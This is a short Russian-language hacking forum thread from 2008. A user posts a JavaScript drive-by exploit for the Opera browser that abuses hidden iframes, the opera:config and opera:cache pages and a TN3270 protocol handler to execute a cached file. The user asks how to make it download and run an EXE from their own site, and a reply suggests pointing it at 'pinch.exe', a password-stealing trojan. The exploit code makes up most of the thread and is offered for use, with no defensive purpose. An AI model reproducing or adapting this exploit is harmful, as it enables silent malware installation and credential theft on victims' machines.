Помогите настроить сплоит Php

Discussion in 'PHP' started by Glynec, 25 Feb 2008.

  1. Glynec

    Glynec Elder - Старейшина

    Joined:
    30 Jan 2008
    Messages:
    68
    Likes Received:
    25
    Reputations:
    2
    Есть сплоит под оперу:

    <script>
    blank_iframe = document.createElement('iframe');
    blank_iframe.src = 'about:blank';
    blank_iframe.setAttribute('id', 'blank_iframe_window');
    blank_iframe.setAttribute('style', 'display:none');
    document.appendChild(blank_iframe);
    blank_iframe_window.eval
    ("config_iframe = document.createElement('iframe');\
    config_iframe.setAttribute('id', 'config_iframe_window');\
    config_iframe.src = 'opera:config';\
    document.appendChild(config_iframe);\
    app_iframe = document.createElement('script');\
    cache_iframe = document.createElement('iframe');\
    app_iframe.src = 'calc.exe';\
    app_iframe.onload = function ()\
    {\
    cache_iframe.src = 'opera:cache';\
    cache_iframe.onload = function ()\
    {\
    cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
    var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
    filename = cache.match(re);\
    config_iframe_window.eval\
    (\"\
    opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
    app_link = document.createElement('a');\
    app_link.setAttribute('href', 'tn3270://nothing');\
    app_link.click();\
    setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
    \");\
    };\
    document.appendChild(cache_iframe);\
    };\
    document.appendChild(app_iframe);");
    </script>



    Что надо вписать вместо calc.exe чтобы сплоит скачивал с моего сайта EXE файл и запускал его.
    Сори за ламерский вопрос но очень нужна помощь.
     
    2 people like this.
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    http://site/pinch.exe
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,194
    Reputations:
    252
    ггг
     
  4. Glynec

    Glynec Elder - Старейшина

    Joined:
    30 Jan 2008
    Messages:
    68
    Likes Received:
    25
    Reputations:
    2
    Спс всем